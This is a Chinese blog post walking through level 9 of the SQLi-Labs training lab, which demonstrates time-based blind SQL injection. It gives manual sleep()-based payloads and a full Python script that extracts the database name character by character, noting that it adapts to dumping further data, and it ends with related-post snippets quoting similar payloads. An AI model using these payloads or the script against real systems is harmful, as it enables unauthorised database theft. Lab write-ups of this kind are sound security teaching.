SQLi LABS Less 9 时间盲注_sqli-labs 时间盲注脚本第九关

于 2024-09-12 00:28:58 发布
阅读量309 收藏 3
点赞数 3
文章标签: less 数据库 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_86951385/article/details/142153804
版权

无报错信息,不适合报错注入;

查询的正确与否不会影响页面的响应(只有一种响应),不适合布尔盲注。

综上所述,考虑使用时间盲注。

三、解题步骤

方式一:时间盲注

第一步、判断注入条件

地址栏输入:?id=1’ and if(1,sleep(5),3) – a

页面响应时间超过5秒,确定存在时间盲注。

第二步、判断长度

判断当前使用的数据库名的长度,地址栏输入:

?id=1' and if((length(database())>1),sleep(5),3) -- a

页面延时,说明长度大于1,依次递增长度判断,后面使用脚本自动化猜解。

第三步、枚举字符

长度确定后,依次截取每一个字符,使用穷举法判断出字符的真实内容(为了方便脚本编写,此处将字符转换为ASCLL后再进行枚举),地址栏输入:

?id=1' and if(
	(ascii(
		substr(
		(database())
		,1,1)
	) >1)
, sleep(5), 3) -- a

页面延时,说明字符的ASCLL码大于1,依次递增判断其余字符内容的可能性(32~126)。

猜解出第一个字符后,在依次判断其余字符,后面使用脚本自动化猜解。

脱库

Python自动化脚本如下,可按需修改:

import requests
import time

# 将url 替换成你的靶场关卡网址
# 修改两个对应的payload

# 目标网址(不带参数)
url = "http://bff5ab64ff054f9c8971180ccaea1d7e.app.mituan.zone/Less-9/"
# 猜解长度使用的payload
payload_len = """?id=1' and if(
	(length(
        (database())
    ) ={n})
,sleep(5),3) -- a"""
# 枚举字符使用的payload
payload_str = """?id=1' and if(
	(ascii(
		substr(
		(database())
		,{n},1)
	) ={r})
, sleep(5), 3) -- a"""

# 获取长度
def getLength(url, payload):
    length = 1  # 初始测试长度为1
    while True:
        start_time = time.time()
        response = requests.get(url= url+payload_len.format(n= length))
        # 页面响应时间 = 结束执行的时间 - 开始执行的时间
        use_time = time.time() - start_time
        # 响应时间>5秒时,表示猜解成功
        if use_time > 5:
            print('测试长度完成,长度为:', length,)
            return length;
        else:
            print('正在测试长度:',length)
            length += 1  # 测试长度递增

# 获取字符
def getStr(url, payload, length):
    str = ''  # 初始表名/库名为空
    # 第一层循环,截取每一个字符
    for l in range(1, length+1):
        # 第二层循环,枚举截取字符的每一种可能性
        for n in range(33, 126):
            start_time = time.time()
            response = requests.get(url= url+payload_str.format(n= l, r= n))
            # 页面响应时间 = 结束执行的时间 - 开始执行的时间
            use_time = time.time() - start_time
            # 页面中出现此内容则表示成功
            if use_time > 5:
                str+= chr(n)
                print('第', l, '个字符猜解成功:', str)
                break;
    return str;

# 开始猜解
length = getLength(url, payload_len)
getStr(url, payload_str, length)

执行结果如下:

其余脱库操作将下图中圈起来的内容替换成脱库语句即可:

2401_86951385
关注
sqli labs 9 时间盲注
Xiaoxiaoqiang_的博客
03-01 303
小学僧
sqlserver数据库布尔盲注_Sqli labs系列-less-8 基于布尔盲注来注入
weixin_34959044的博客
01-16 117
第八,还是上一一样,我们无法得出数据的,不过如果用盲注的手段,我还是可以猜测出数据的。盲注具体是啥意思,我就不说了,玩这个都直达,常见的盲注,一个基于布尔值的盲注,一个是基于时间上的盲注。这里我们用到的是基于布尔的盲注,当然,这章,我们只是利用这一,让大家更深入的理解的什么是基于布尔值的盲注。在我自己的学习中,我是很讨厌看文字的,同时如果看图的话,还能看的进心里,同时也好理解,但是很多人的图...
SQLi LABS Less 9 时间盲注
热门推荐
wangyuxiang946的博客
06-22 1万+
SQLi 第九SQLi-LABS Less-9,SQLi-LABS Less 9,SQLiLABS Less9,SQLi Less 9
SQL注入——sqli-labs-Less-9时间盲注
m0_63563528的博客
04-06 631
时间盲注 和 Bool 盲注很像,区别就是 “参照物” 的不同
sqli-labs Less-9 时间盲注
m0_63711447的博客
04-12 1046
使用的函数补充: if(condition,A,B)如果条件condition为true,则执行语句A,否则执行语句B eg.select if(1>2,3,4); 返回的结果为4(若是在MySQL命令行中使用,应先use xxx数据库) 可组合使用,当前数据库为security ...
sqli-labs:less-9(时间盲注
羽的博客
07-21 446
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset...
sqli-labs 通教程 Less 9 (时间盲注)
一期一会的博客
12-08 2686
利用正常的语句测试没有任何效果 http://127.0.0.1/sqlilabs/Less-9/?id=1 http://127.0.0.1/sqlilabs/Less-9/?id=1'-- - 数据完成交互后目标网站没有任何的页面回显,这个时候可以使用时间盲注。 http://127.0.0.1/sqlilabs/Less-9/?id=1' and if(1=1,sleep(3),1)-- - //沉睡 http://127.0.0.1/sqlilabs/Less-9/?id=1 a.
Sqli-labs靶场第9详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 1838
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间盲注(Time-based blind)
sqli-labs Less-5(布尔盲注
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
01-31 635
前几篇sql注入文章 sqli-labs Less-1(联合注入、字符型注入) sqli-labs Less-2(联合注入、整形型注入) sqli-labs Less-3(联合注入、字符型注入) sqli-labs Less-4(联合注入、字符型注入) sqli-labs Less-5(利用extractvalue进行报错注入) sqli-labs Less-5(双注入) 布尔盲注其实就是构造一个SQL语句,当语句成立时,页面会返回特点的标识,语句不成立是返回其他,或无数据。因此我们可以构造一个判断语句,利
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例.doc
07-09
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例 本文档主要讲解了如何结合手工注入编写一个SQL盲注脚本,以SQLi-Labs less16为例。整个过程可以分为两部分:分析测试注入点和获取数据库名编写脚本。 ...
sqli-labs盲注脚本
06-24
sqli-labs盲注脚本 sqli-labs盲注脚本 sqli-labs盲注脚本
sqli-labs-less9
m0_68980215的博客
07-08 191
sql lesson9
SQL注入——基于时间盲注sqli-labs less9)
yuan114012的博客
05-21 988
一.基于时间盲注 适用场景:没有数据回显,条件正确与否结果一样 利用方式:构造判断条件,添加sleep,逐个猜测(盲猜) 1.所需语法与函数 IF表达式 IF( expr1 , expr2 , expr3 ) #expr1 的值为 TRUE,则返回值为 expr2 #expr1 的值为FALSE,则返回值为 expr3 expr1 的值为 TRUE,则返回值为 expr2 expr1 的值为FALSE,则返回值为 expr3 mysql> select if(1=1,1,.
【针对sqli-labs第9时间盲注python脚本
AA8j的博客
09-09 750
效果图 源码 #!/usr/bin/python # -*- coding: utf-8 -*- # @Time : 2021/9/7 10:20 # @Author : AA8j # @Site : # @File : Time-based-blind-SQL-injection.py # @Software: PyCharm # @Blog : https://blog.csdn.net/qq_44874645 import binascii import request
SQL注入——sqli-labs-Less-9时间盲注_sqliless9,2024年最新面试宝典
最新发布
2401_84183070的博客
04-10 662
时间盲注,通过时间函数使SQL语句执行时间延长,从页面响应时间判断条件是否正确的一种注入方式。
sqli-labs 第九 基于时间盲注 python 脚本
Mirror_iu的博客
01-25 3104
# @Author:Mirror import time import requests db_len = 0 def get_schema_len (url): len = 0 left = 0 right = 20 while (left <= right): mid = left + (right - left)//2; data = "id=1' and if(length(database())>{},sleep(0.
Sqli-labs之Less-9和Less-10
m0_46315342的博客
06-04 1332
                                          &nbs...
sqli-labs第九
qq_56726035的博客
04-08 716
sqli-labs第九
sqli-labs通-------09lesson-时间盲注(单引号)
枯藤闲画云
07-05 315
我们先判断有没有注入点,目测好像是没有 根据这个图好像是没有闭合的意思。。 然后我们就开始对?id=1 进行单引号、双引号、括号,及他们的组合是一个查看页面变化。 然后发现它一直是这个鬼样子。 看了我们需要尝试一下盲注了,既然啥也不显示,试试时间盲注吧。 好像是至此用 ?id=1 and sleep(5)--+ 好像啥大反应。 在尝试一下闭合,发现?id=1...
sqli-labs第七盲注
08-31
对于sqli-labs的第七,这是一道盲注的挑战。在这个卡中,你需要利用盲注漏洞来获取敏感信息。 盲注是一种利用应用程序对用户输入的处理不当而导致的漏洞。这种漏洞通常出现在应用程序使用用户提供的数据来...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值